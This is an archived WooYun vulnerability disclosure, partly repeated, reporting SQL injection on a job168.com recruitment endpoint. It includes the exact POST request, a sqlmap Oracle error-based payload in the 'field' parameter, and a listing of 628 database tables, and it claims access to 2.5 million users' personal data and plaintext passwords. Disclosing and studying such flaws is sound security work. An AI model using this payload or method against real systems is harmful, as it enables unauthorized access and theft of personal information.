南方人才网某站存在SQL注入涉及250万个人信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139176

漏洞标题：南方人才网某站存在SQL注入涉及250万个人信息

漏洞作者：路人甲

提交时间：2015-09-06 10:41

修复时间：2015-09-11 10:42

公开时间：2015-09-11 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-06：细节已通知厂商并且等待厂商处理中
2015-09-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

可登陆账号对简历进行操作和查看证件信息，联系方式等等

详细说明：

http://u.job168.com/

POST /companyOfTheMeetingListWeb.action HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://u.job168.com:80/
Cookie: JSESSIONID=aaaZtswx-pIG34qboCB_u
Host: u.job168.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
dateTime=0&degree=&field=1&loc=&meetingNo=1041&name=&page=1

field参数

628个表：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: field (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: dateTime=0&degree=&field=1') AND 2412=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2412=2412) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('jiiV'='jiiV&loc=&meetingNo=1041&name=&page=1
---
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: field (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: dateTime=0&degree=&field=1') AND 2412=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2412=2412) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('jiiV'='jiiV&loc=&meetingNo=1041&name=&page=1
---
back-end DBMS: Oracle
Database: NFRC
[628 tables]
+-------------------------------------------------+
| ACCESSLOG                                       |
| ACCESS_STATISTIC                                |
| ACTIVEEMAIL                                     |
| ACTIVELOG                                       |
| AD_AUTO                                         |
| AD_DESIGN                                       |
| AD_OPEN_LOG                                     |
| AD_STAT                                         |
| AD_TRACER                                       |
| AGENCY_MATERIAL                                 |
| AGENCY_NOTICE                                   |
| AGENCY_PERSON                                   |
| AGENCY_PROGRESS                                 |
| AGENCY_SERVICE                                  |
| AGENCY_TRACER                                   |
| ALEXA                                           |
| ALEXA_BK                                        |
| ALEXA_PRIZE                                     |
| ALIPAY                                          |
| ALIPAY_OUTLET                                   |
| ANGEL_P                                         |
| ANGEL_P_BK                                      |
| APPLYLOG                                        |
| APPLYLOG_BK                                     |
| APPLYLOG_TEMP                                   |
| APP_FEEDBACK                                    |
| APP_LOG                                         |
| APP_RECRUIT_SHAKE                               |
| APP_VERSION                                     |
| ASIAN_PHOTO                                     |
| ASIAN_PHOTO_VOTE                                |
| ASIAN_PHOTO_VOTE_BK                             |
| ASSIGN                                          |
| ASSIGN2                                         |
| BBS_USER                                        |
| BLOG_ALBUM                                      |
| BLOG_ARTICLE                                    |
| BLOG_FRIEND                                     |
| BLOG_INFO                                       |
| BLOG_MSG                                        |
| BLOG_PERSON                                     |
| BLOG_PHOTO                                      |
| BLOG_RANK                                       |
| BLOG_REPLY                                      |
| BLOG_REPORT                                     |
| BLOG_TYPE                                       |
| BROAD_MESSAGE                                   |
| CARD                                            |
| CC                                              |
| CLAIM                                           |
| COMMON_EXCHANGE                                 |
| COMMON_GOODS                                    |
| COMMON_GOODS_HIPIAO                             |
| COMMON_GOODS_OWNS                               |
| COMMON_GOODS_OWNSLOG                            |
| COMMON_PRODUCT                                  |
| COMPANY                                         |
| COMPANY_APPLYFUNC                               |
| COMPANY_BACKUP                                  |
| COMPANY_DEGREE                                  |
| COMPANY_FIELD                                   |
| COMPANY_INDUSTRY                                |
| COMPANY_PROPERTY                                |
| COMPANY_STATICS                                 |
| COMPANY_WORKLOC                                 |
| COMPANY_WORKYEARS                               |
| COM_POPULOR_WORD                                |
| COURSEWARE                                      |
| CTIBILL                                         |
| CUSTOMER_MOBILE                                 |
| CUSTOM_INFO                                     |
| CYDS_ARTICLE                                    |
| CYDS_INFO                                       |
| CYDS_MEMBER                                     |
| CYDS_PROJ                                       |
| CYDS_PROJ_2012                                  |
| CYDS_PROJ_BAK                                   |
| CYDS_PROJ_BK                                    |
| CYDS_SCHOOL                                     |
| CYDS_SCHOOL_2012                                |
| CYDS_SCORE                                      |
| CYDS_SCORE_2012                                 |
| CYDS_USERS                                      |
| CYDS_VOTE                                       |
| C_AD                                            |
| C_ASSIGN                                        |
| C_ASSIGN2                                       |
| C_ATTACHMENT                                    |
| C_ATTACHMENT_HISTORY                            |
| C_CONTACT                                       |
| C_CUSTOM                                        |
| C_ENGLISH                                       |
| C_EXPORT                                        |
| C_EXT_FEE                                       |
| C_FAVORITE                                      |
| C_FAVORITE_TYPE                                 |
| C_FEE_HISTORY                                   |
| C_HRA_TRACER                                    |
| C_ID5_FEE                                       |
| C_ID5_TRACER                                    |
| C_INTEGRAL                                      |
| C_JYPPH                                         |
| C_OP_LOG                                        |
| C_PICTURE                                       |
| C_REPLY                                         |
| C_RESUME_LOG                                    |
| C_SURVEY                                        |
| C_TRACER                                        |
| C_XQT                                           |
| DATAYEAR                                        |
| DELIVERY_COMPANY                                |
| DELIVERY_RESUME                                 |
| DEPARTMENT                                      |
| DEVELOP_ASSIGN                                  |
| DEVELOP_ROBIN                                   |
| DEVELOP_SHIELD                                  |
| DEVELOP_TRACE                                   |
| DIC_AUTH                                        |
| DIC_BLOG_TMPL                                   |
| DIC_COURSE                                      |
| DIC_COURSE1                                     |
| DIC_COURSE2                                     |
| DIC_DEGREE                                      |
| DIC_DEPT                                        |
| DIC_EMPNUM                                      |
| DIC_FIELD                                       |
| DIC_FIELD2                                      |
| DIC_FUNC                                        |
| DIC_FUNC_CATEGORY                               |
| DIC_FUNC_TYPE                                   |
| DIC_FUND                                        |
| DIC_H_CLIENT                                    |
| DIC_H_COOPERATE                                 |
| DIC_H_INDUSTRY                                  |
| DIC_H_PACT_TMPL                                 |
| DIC_H_PROPERTY                                  |
| DIC_H_REGION                                    |
| DIC_INDUSTRY                                    |
| DIC_LANGUAGE                                    |
| DIC_LEVEL                                       |
| DIC_LEVEL2                                      |
| DIC_MEMBER_TYPE                                 |
| DIC_OPERATOR                                    |
| DIC_PROPERTY                                    |
| DIC_REGION                                      |
| DIC_REGION_STREET                               |
| DIC_SALARY                                      |
| DIC_SALARY2                                     |
| DIC_SCHOOL_KIND                                 |
| DIC_SCHOOL_PROPERTY                             |
| DIC_SVC                                         |
| DIC_TAG                                         |
| DIC_TALENT_TYPE                                 |
| DIC_TITLE                                       |
| DRAW                                            |
| DXC_SOLD                                        |
| DXC_VIP                                         |
| EDM_TMP                                         |
| EMAIL_BLACKLIST                                 |
| EMAIL_LOG                                       |
| EMAIL_RECORD                                    |
| EMAIL_SETTING                                   |
| EMAIL_TEMPLATE                                  |
| ENROLL                                          |
| ENTERGZ                                         |
| ENTRY                                           |
| ENTRY_EDUC                                      |
| ENTRY_OTHER                                     |
| ENTRY_POS                                       |
| ENTRY_SCORE                                     |
| EVAL_MODEL                                      |
| EXAM_ACTIVE                                     |
| EXAM_COURSE                                     |
| EXAM_COU_TUTO                                   |
| EXAM_FEE                                        |
| EXAM_REGIST                                     |
| EXAM_RESEARCH                                   |
| EXAM_SCHEDULE                                   |
| EXAM_SEND_SMS                                   |
| EXAM_SIGNIN                                     |
| EXAM_SMSREQ                                     |
| EXAM_STUDENT                                    |
| EXAM_TEACHER                                    |
| EXAM_TRACE                                      |
| EXAM_TRAIN_BOOKING                              |
| EXAM_TUTORIAL                                   |
| EXAM_TUTO_TAKE                                  |
| EXCEL_COMPANY                                   |
| FAIR_APPLY_LOG                                  |
| FAIR_APPLY_STALL                                |
| FAIR_FEEDBACK                                   |
| FAIR_LOC                                        |
| FAIR_RECRUIT                                    |
| FEEDBACK                                        |
| FEEDBACK2                                       |
| FEEDBACK3                                       |
| FIFA_FANS                                       |
| FIFA_POST                                       |
| FIFA_TEAM                                       |
| FROM2FUTURE                                     |
| GLOBAL_USER                                     |
| GOLDTURNTABLE_LOG                               |
| GOLDTURNTABLE_PRIZE                             |
| GOLDTURNTABLE_TICKET                            |
| GZSA                                            |
| GZ_GRADUATE                                     |
| HRA_COMPETENCY                                  |
| HRA_LAW                                         |
| HRA_SUBJECT                                     |
| HRA_S_BASE_DATA_2010                            |
| HRA_S_BASE_DATA_2012                            |
| HRA_S_CITY                                      |
| HRA_S_CITY_07                                   |
| HRA_S_DEGREE_FACTOR_2010                        |
| HRA_S_DEGREE_FACTOR_2012                        |
| HRA_S_DETAIL_FACTOR_2010                        |
| HRA_S_DETAIL_FACTOR_2012                        |
| HRA_S_EMPLOYEE_NUM_FACTOR_2010                  |
| HRA_S_EMPLOYEE_NUM_FACTOR_2012                  |
| HRA_S_INDUSTRY                                  |
| HRA_S_INDUSTRY_07                               |
| HRA_S_INDUSTRY_FACTOR_2010                      |
| HRA_S_INDUSTRY_FACTOR_2012                      |
| HRA_S_LOCATION_2010                             |
| HRA_S_LOCATION_2012                             |
| HRA_S_LOC_FACTOR_2010                           |
| HRA_S_LOC_FACTOR_2012                           |
| HRA_S_PERCENT_FACTOR_2010                       |
| HRA_S_PERCENT_FACTOR_2012                       |
| HRA_S_POSITION                                  |
| HRA_S_POSITION_07                               |
| HRA_S_POSITION_2010                             |
| HRA_S_POSITION_2012                             |
| HRA_S_POSITION_STAT                             |
| HRA_S_POSITION_STAT_07                          |
| HRA_S_PROPERTY_FACTOR_2010                      |
| HRA_S_PROPERTY_FACTOR_2012                      |
| HRA_S_SAMPLE_ANALYSIS_2010                      |
| HRA_S_SAMPLE_ANALYSIS_2012                      |
| HRA_S_SAMPLE_STAT                               |
| HRA_S_SAMPLE_STAT_07                            |
| HRA_S_WORKYEAR_FACTOR_2010                      |
| HRA_S_WORKYEAR_FACTOR_2012                      |
| HRA_TEMPLATE                                    |
| HRA_TEMP_TYPE                                   |
| HRS_PERSON                                      |
| HRS_P_EDUC                                      |
| HRS_P_EXP                                       |
| HRS_P_VOL                                       |
| HR_NOTE                                         |
| HUNTER                                          |
| HUNTER_COMPANY                                  |
| HUNTER_C_ENGLISH                                |
| HUNTER_PERSON                                   |
| HUNTER_RECRUIT                                  |
| H_APPLYLOG                                      |
| H_APPRAISE                                      |
| H_ATTACHMENT                                    |
| H_ATTACHMENT_P                                  |
| H_CANDIDATE                                     |
| H_CANDIDATE_BAK                                 |
| H_CANDIDATE_BK                                  |
| H_CHANGE                                        |
| H_COMMEND                                       |
| H_COMPANY                                       |
| H_COMPANY_BK                                    |
| H_C_EDUC                                        |
| H_C_EDUC_BK                                     |
| H_C_EXP                                         |
| H_C_EXP_BK                                      |
| H_C_TAG                                         |
| H_DEL_LOG                                       |
| H_DESCRIPT                                      |
| H_EMAIL                                         |
| H_FEEDBACK                                      |
| H_FEEDBACK2                                     |
| H_FEEDBACK2_BK                                  |
| H_FEEDBACK_OL                                   |
| H_INV                                           |
| H_MESSAGE                                       |
| H_PACT                                          |
| H_PACT2                                         |
| H_PAYLOG                                        |
| H_PHOTO                                         |
| H_RECOMMEND                                     |
| H_RECRUIT                                       |
| H_RECRUITLOG                                    |
| H_R_EDUC                                        |
| H_R_EXP                                         |
| H_SEARCH                                        |
| H_SERVICE                                       |
| H_SERVICE_BK                                    |
| H_TEXT                                          |
| H_TRACE                                         |
| H_TRACE2                                        |
| H_TRACE2_BK                                     |
| H_TRACE_BK                                      |
| H_VISIT_LOG                                     |
| ID5ADJ                                          |
| IDCARD_TEMP                                     |
| IND_POPULOR_WORD                                |
| INFO                                            |
| INFO_ATTACHMENT                                 |
| INFO_POSITION                                   |
| INFO_PY                                         |
| INFO_REPLY                                      |
| INTOGZ_APPLYLOG                                 |
| INTOGZ_COMPANY                                  |
| INTOGZ_RECRUIT                                  |
| INTOGZ_REQUIREMENT                              |
| INVEST                                          |
| JOB168BABY                                      |
| JOB168BABY_GUESS                                |
| JOB168BABY_VOTE_LOG                             |
| JOB168BABY_VOTE_LOG_BK                          |
| JOB168E                                         |
| JOB168E_REPLY                                   |
| JOB168E_TMP                                     |
| JOB168E_TMP2                                    |
| JOB168E_TMP3                                    |
| JOB_FAIR                                        |
| JZ_ACCESS                                       |
| JZ_FAQ                                          |
| JZ_PERSON                                       |
| JZ_USER                                         |
| JZ_USER_ACCESS                                  |
| KEDUO_USER                                      |
| LINK_CLICK_LOG                                  |
| LOCKEDEMAIL                                     |
| LOG114                                          |
| MAIL                                            |
| MAILDS_LOG                                      |
| MAILDS_OPEN_LOG                                 |
| MAIL_BL                                         |
| MAIL_SUBSCRIPT                                  |
| MAP2010_FIELD                                   |
| MAP2010_FUNC                                    |
| MAP2010_INDUSTRY                                |
| MAP2010_REGION                                  |
| MAP2011_FUNC                                    |
| MEETING                                         |
| MEETING_APPLY                                   |
| MEETING_APPLY_RECRUIT                           |
| MEETING_ARTICLE                                 |
| MEETING_BOOTH                                   |
| MEETING_RELATE                                  |
| MEETING_SIGNIN                                  |
| MEETING_SIGNIN_LOG                              |
| MEMBERFEE                                       |
| MEMBERFEE2                                      |
| MEMBERFEE_BK                                    |
| MEMBER_FEE                                      |
| MESSAGE                                         |
| NETPAY_OUTLET                                   |
| NEWSPAPER_BOARD                                 |
| NEWSPAPER_DETAIL                                |
| NEWSPAPER_SECOND                                |
| NFRC2GZRIS                                      |
| NOAHSARK                                        |
| OAUTH_CONNECT                                   |
| OK309_CARD                                      |
| OK309_USER                                      |
| OLDPHOTO                                        |
| OLDPHOTO_VOTE_LOG                               |
| OP                                              |
| OP200910301316                                  |
| OV_TRANSACTION                                  |
| O_APPLYLOG                                      |
| O_COMPANY                                       |
| O_RECRUIT                                       |
| O_TRACE                                         |
| P                                               |
| PARTNER                                         |
| PAYMENTLOG                                      |
| PERSON                                          |
| PERSON_APPLYFUNC                                |
| PERSON_BACKUP                                   |
| PERSON_DEGREE                                   |
| PERSON_FIELD                                    |
| PERSON_INDUSTRY                                 |
| PERSON_PROPERTY                                 |
| PERSON_SKILL                                    |
| PERSON_STATICS                                  |
| PERSON_SYNC                                     |
| PERSON_TEMPLATE                                 |
| PERSON_WORKLOC                                  |
| PERSON_WORKYEARS                                |
| PHOTO                                           |
| PLAN_TABLE                                      |
| POCOUSER                                        |
| POCOZINE                                        |
| POCO_SERVICE                                    |
| POCO_SERVICE_BUY                                |
| POCO_TEMPLATE                                   |
| POCO_TEMPLATE_BUY                               |
| PP                                              |
| PREPARE_COMPANY                                 |
| PRESSIE_APPLY                                   |
| PRESSIE_APPLY_DETAIL                            |
| PRESSIE_APPLY_INTEGRAL                          |
| PRICE_C_AD                                      |
| PRICE_C_CUSTOM                                  |
| PRICE_C_NP                                      |
| PRICE_C_STD                                     |
| PRICE_C_VER                                     |
| PRODUCT                                         |
| PRODUCT_PACKAGE                                 |
| PRODUCT_PRICE                                   |
| PT_APP_REGIST                                   |
| PT_APP_VIEW                                     |
| PT_BASE                                         |
| PT_CERT                                         |
| PT_C_COMPLAINT                                  |
| PT_C_REVIEW                                     |
| PT_C_SCORE                                      |
| PT_EDUC                                         |
| PT_EXP                                          |
| PT_PROJ                                         |
| PT_P_COMPLAINT                                  |
| PT_P_REVIEW                                     |
| PT_P_SCORE                                      |
| PYZP_SIGNUP                                     |
| P_ADDRESS                                       |
| P_ARMY                                          |
| P_ARTICLE                                       |
| P_ARTICLE_BK                                    |
| P_ATTACHMENT                                    |
| P_AUTH                                          |
| P_CARD                                          |
| P_CERT                                          |
| P_COLLECT                                       |
| P_CUSTOM                                        |
| P_DEGREE_CERT                                   |
| P_EDUC                                          |
| P_ENGLISH                                       |
| P_ETCSVC                                        |
| P_EVAL                                          |
| P_EVAL_NEW                                      |
| P_EXP                                           |
| P_EXT_FEE                                       |
| P_EXT_FEE2                                      |
| P_FAVORITE                                      |
| P_FAVORITE_TEMP                                 |
| P_FEE_HISTORY                                   |
| P_ID                                            |
| P_ID5                                           |
| P_INVEST_LOGIN                                  |
| P_IVEST                                         |
| P_NOTICE                                        |
| P_OP_LOG                                        |
| P_ORDER                                         |
| P_OTHER                                         |
| P_PRIZE                                         |
| P_PROJ                                          |
| P_REG_SPAM                                      |
| P_RESUME                                        |
| P_SAMPLING                                      |
| P_SCHOOL                                        |
| P_SEARCH_LOG                                    |
| P_SENDOUT                                       |
| P_SEND_FRIEND                                   |
| P_SERVICE                                       |
| P_SERVICE_LOG                                   |
| P_SKILL                                         |
| P_SMS_SVC                                       |
| P_SMS_SVC2                                      |
| P_TASK                                          |
| P_TASK_LOG                                      |
| P_TEMPLATE                                      |
| P_TEXT                                          |
| P_TRACER                                        |
| P_VISIT_LOG                                     |
| P_VOL                                           |
| P_XQT                                           |
| QA                                              |
| QUARTER_SUM                                     |
| QUERYPASS2LOG                                   |
| Q_BODY                                          |
| Q_DIM                                           |
| Q_ELEMENT                                       |
| Q_EXPR                                          |
| Q_MAP                                           |
| Q_MODULE                                        |
| Q_PAPER                                         |
| Q_REMARK                                        |
| Q_TOPIC                                         |
| Q_VALUE                                         |
| RCJ_ASSIGN                                      |
| RCJ_SCORE                                       |
| RCJ_USERS                                       |
| RECRUIT                                         |
| RECRUITLOG                                      |
| RECRUIT_APPLY_RELATED                           |
| RECRUIT_BK                                      |
| RECRUIT_CATALOG                                 |
| RECRUIT_PYZP                                    |
| RECRUIT_RECYCLED                                |
| RECRUIT_S                                       |
| RECRUIT_TMP                                     |
| REFERRER_TEMP                                   |
| RESUME                                          |
| RESUMEOUT_LOG                                   |
| ROBIN_EXCEL_COMPANY                             |
| RR                                              |
| SALARY_CITYCOEFFICIENT                          |
| SALARY_CITYCOEFFICIENT_07                       |
| SALARY_DESCRIPTION                              |
| SALARY_DESCRIPTION_07                           |
| SALARY_INDUSTRYCOEFFICIENT                      |
| SALARY_INDUSTRYCOEFFICIENT_07                   |
| SALARY_POSITION                                 |
| SALARY_POSITION_07                              |
| SALARY_SAMPLEANALYSIS                           |
| SALARY_SAMPLEANALYSIS_07                        |
| SALARY_STAT                                     |
| SALESMAN                                        |
| SCHOOL                                          |
| SCHOOL_FIELD                                    |
| SCHOOL_INFO                                     |
| SCHOOL_MEMBER_FEE                               |
| SCHOOL_PAYMENTLOG                               |
| SCHOOL_PERSON                                   |
| SCHOOL_PHOTO                                    |
| SCHOOL_RECRUITLOG                               |
| SCHOOL_REQ                                      |
| SCHOOL_STUDINFO                                 |
| SHOP_APPLY                                      |
| SHOP_ARTICLE                                    |
| SHOP_ARTICLE_STORE                              |
| SHOP_BUSINESS                                   |
| SHOP_BUSINESS_LIMITS                            |
| SHOP_COUPON                                     |
| SHOP_CUSTOMER                                   |
| SHOP_DELIVERY                                   |
| SHOP_GOODS                                      |
| SHOP_GOODS_BELONG                               |
| SHOP_GOODS_BRAND                                |
| SHOP_GOODS_PIC                                  |
| SHOP_GOODS_REPLY                                |
| SHOP_GOODS_TYPE                                 |
| SHOP_HRCOST                                     |
| SHOP_MEMBER_LEVEL                               |
| SHOP_ORDER                                      |
| SHOP_ORDER_DETAIL                               |
| SHOP_PAY                                        |
| SHOP_POSTAGE                                    |
| SHOP_REPORT                                     |
| SHOP_SALESCOST                                  |
| SHOP_STOCK                                      |
| SHOP_STOCK_ORDER                                |
| SHOP_STOCK_ORDER_DETAIL                         |
| SHOP_STRATEGY                                   |
| SHOWCASE                                        |
| SHOWCASE_AD                                     |
| SIGNUP                                          |
| SMS                                             |
| SMS_ANTI_RESEND                                 |
| SMS_CUSTOM                                      |
| SMS_CUSTOM_LIST                                 |
| SMS_MESSAGE                                     |
| SMS_MO                                          |
| SMS_NO_ID                                       |
| SMS_NUMBER                                      |
| SMS_NUMBER2                                     |
| SMS_REQUIREMENT                                 |
| SMS_TEMP                                        |
| SMS_TRACER                                      |
| SMS_WHITELIST                                   |
| SMS_WHITELIST_APPLY                             |
| SOFT_COMPANY                                    |
| STATISTIC_CUSTOM                                |
| STUDENT_ASSIGN                                  |
| SUB_COMPANY                                     |
| SURVEY                                          |
| SURVEY2                                         |
| SURVEY2_REPT                                    |
| SURVEY_REPT                                     |
| S_CUSTOM                                        |
| S_FAVORITE                                      |
| S_RECRUITMENT                                   |
| S_SIGNUP                                        |
| TAG_MAP                                         |
| TALENT_KEYWORD_LOG                              |
| TASK_LOG                                        |
| TBBBS                                           |
| TBBBSORTS                                       |
| TEMP_COMPANY                                    |
| TEMP_CTI                                        |
| TEMP_FAIL                                       |
| TEMP_PERSON                                     |
| TEMP_RECRUIT                                    |
| TEMP_USER                                       |
| TENPAY                                          |
| TMP_ASSIGN                                      |
| TMP_EMAIL_LOG                                   |
| TRACE_LOG                                       |
| TRAINING                                        |
| TRAIN_APPLY                                     |
| TRAIN_APPLY2                                    |
| TRAIN_CONSUME_LOG                               |
| TRAIN_COURSE                                    |
| TRAIN_ORGAN                                     |
| TRAIN_ORGAN_FEE                                 |
| TRAIN_ORGAN_FEE_BK                              |
| TRAIN_PAYMENTLOG                                |
| TRAIN_TRAINER                                   |
| TRANSFER                                        |
| TRANSFER2                                       |
| TUTORIAL_STORE                                  |
| T_CHG_ORDER                                     |
| UNIONPAY                                        |
| UNIT_KEYWORD_LOG                                |
| X_COMPANY                                       |
| X_COMPANY_FEE                                   |
| X_PERSON                                        |
| X_PERSON_FEE                                    |
| X_TRACE                                         |
| ZSQZTLOG                                        |
| ZSQZTVALID                                      |
| ZYGH_COLLEGE                                    |
| ZYGH_CPBG                                       |
+-------------------------------------------------+

250万用户信息：

漏洞证明：

明文密码，登录进去看看：

简历信息：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-11 10:42

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139176

漏洞标题：南方人才网某站存在SQL注入涉及250万个人信息

相关厂商：job168.com

漏洞作者：路人甲

提交时间：2015-09-06 10:41

修复时间：2015-09-11 10:42

公开时间：2015-09-11 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139176

漏洞标题：南方人才网某站存在SQL注入涉及250万个人信息

相关厂商：job168.com

漏洞作者： 路人甲

提交时间：2015-09-06 10:41

修复时间：2015-09-11 10:42

公开时间：2015-09-11 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0139176"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云